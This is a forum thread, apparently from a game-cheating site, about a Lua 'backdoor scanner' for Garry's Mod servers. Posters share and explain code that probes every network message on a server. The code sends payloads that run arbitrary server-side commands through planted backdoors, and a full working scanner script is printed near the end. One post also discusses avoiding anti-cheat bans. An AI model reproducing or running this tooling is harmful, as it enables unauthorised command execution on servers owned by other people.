PostSimple backdoor scanner

Posts 1–15 of 19 · Page 1 of 2
Simple backdoor scanner
backdoor scanner:
1.Download
2.Run script
if the backdoor is found, it will disconnect you from the server, and write to the console the name of the backdoor that you can use later.

example:
net.Start("Limon")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()
le_mpgh.net.rar425 B · 2,358 downloads Clean
how to download
im stupid how xd?
How do use use the backdoor name
I don't know what I do with the name of the backdoor.
Quote Originally Posted by XtomatenX1234 View Post
I don't know what I do with the name of the backdoor.
You learned to read, haven't ya ? Try to understand the code and then modify it depending on your backdoor name.
Quote Originally Posted by Sakimoto View Post
You learned to read, haven't ya? Try to understand the code and then modify it depending on your backdoor name.
Yes, I can read. But I'm new to this and I don't get it. The only thing I have ever really used is spirit walk and IdiotBox. If someone would explain it to me I would be really thankful.
Quote Originally Posted by XtomatenX1234 View Post
Yes, I can read. But I'm new to this and I don't get it. The only thing I have ever really used is spirit walk and IdiotBox. If someone would explain it to me I would be really thankful.

Well, to put it simply...

You have to check in the console. The script will look for a backdoor through all the commands and addons available on the server.Once the backdoor is found, it will disconnect you from the server and you will have to find the backdoor's name in the console logs. Now, all you have to do is take the OP's script (for example) or a backdoor menu if you have one, and modify the backdoor's name with the one you just found.

Example : if the scanner disconnects me after testing something named like "pointshop", all you'll have to do is run a .lua with the following lines :

net.Start("pointshop")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()


Is it clearer now ?
Thanks
Quote Originally Posted by Sakimoto View Post
Well, to put it simply...

You have to check in the console. The script will look for a backdoor through all the commands and add-ons available on the server. Once the backdoor is found, it will disconnect you from the server and you will have to find the backdoor's name in the console logs. Now, all you have to do is take the OP's script (for example) or a backdoor menu if you have one, and modify the backdoor's name with the one you just found.

Example : if the scanner disconnects me after testing something named like "pointshop", all you'll have to do is run a .lua with the following lines :

net.Start("pointshop")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()


Is it clearer now?

Yes, thank you very much this was extremely helpful and I'm very thankful.
Quote Originally Posted by Sakimoto View Post
Well, to put it simply...

You have to check in the console. The script will look for a backdoor through all the commands and addons available on the server.Once the backdoor is found, it will disconnect you from the server and you will have to find the backdoor's name in the console logs. Now, all you have to do is take the OP's script (for example) or a backdoor menu if you have one, and modify the backdoor's name with the one you just found.

Example : if the scanner disconnects me after testing something named like "pointshop", all you'll have to do is run a .lua with the following lines :

net.Start("pointshop")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()


Is it clearer now ?
Finally I got it many thanks!
Bad idea
Quote Originally Posted by Lemosgg View Post
backdoor scanner:
1.Download
2.Run script
if the backdoor is found, it will disconnect you from the server, and write to the console the name of the backdoor that you can use later.

example:
net.Start("Limon")
net.WriteString(" RunConsoleCommand('say','hack') ")
net.WriteBit(1)
net.SendToServer()
Do not use that because is SNTE Is installed you will get banned as soon as you net.sendtoserver use util.NetworkStringToID(str)
Quote Originally Posted by t3r00t View Post
Do not use that because is SNTE Is installed you will get banned as soon as you net.sendtoserver use util.NetworkStringToID(str)
It appears that the script uses that instead. The example is the only faulty thing here.
Hmm does this work?
What is a backdoor?
local cooldown = 1.1
local messagesStarted = false

local function ValidNetString(str)
return isstring(str) and util.NetworkStringToID(str) != 0 and str != ""
end


local timerCount = 0
for count = 0, 65536 do
local currentNetMSg = util.NetworkIDToString(count)
print(currentNetMSg)
if messagesStarted and not currentNetMSg then
print("Finished")
break
end
if currentNetMSg and currentNetMSg != "" then
messagesStarted = true
if not net.Receivers[currentNetMSg] then
if ValidNetString(currentNetMSg) then
timerCount = timerCount + cooldown
print(timerCount)
timer.Simple(timerCount, function()
print("Sent net message: "..currentNetMSg)
net.Start(currentNetMSg)
net.WriteString('util.AddNetworkString("foundwhatw elookinfor")')
net.WriteBit(1)
net.SendToServer()
if ValidNetString("foundwhatwelookinfor") then
print("Found backdoor: "..currentNetMSg)
RunConsoleCommand("disconnect")
else
print("Not backdoor")
end
print("---------------------------------------------")
end)
end
end
end
end
Posts 1–15 of 19 · Page 1 of 2

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?